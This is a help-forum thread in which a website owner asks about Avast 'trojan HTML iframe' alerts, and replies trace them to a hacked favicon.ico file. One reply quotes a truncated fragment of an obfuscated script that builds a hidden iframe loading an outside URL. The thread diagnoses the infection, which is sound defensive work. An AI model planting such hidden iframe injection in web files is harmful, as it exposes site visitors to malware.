Hi, need some help, I have a website that I scaned and avast has picked up a lot of trojans html iframes, i am still trying to find out how to remove them but my question is about false reeadings, I uploaded a fresh page on my site and avast has picked that up as a trojan html iframe, so n0ow I am wondering if a lot of theseare false readings or not, if someone wants to look at my site, its tgirlplace.com ( dont want to affend anyone, it is adult) this is a new index page i uploaded and avast gos off as a trojan htmliframe, thanks for any feedback
I looked at the html on the page.
I don’t think there is any thing wrong with that page, unless there is unusual code amongst the html that is triggering false alerts. I think it is more what’s feeding in and out of the page that is the problem. Something not on that particular page. But I’m no expert. Others on the forum are more adept at these kind of things. Someone will be along shortly.
Looking at the page avast gives an alert favicon.ico file not the index page, see image.
This is a common hack as the browser looks for and loads the favicon.ico into the address bar. So it could be a hacked favicon.ico file or the favicon.ico file has been removed which redirects to a custom 404 error page and that can be created or hacked to add an iframe.
-= Some sort a weird script on favicon.ico…?
var k1='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22',...
The weird script creates the iframe tag and the contents.
There should be zero HTML content in the .ico file as it is essentially just an image. As I said it has been hacked.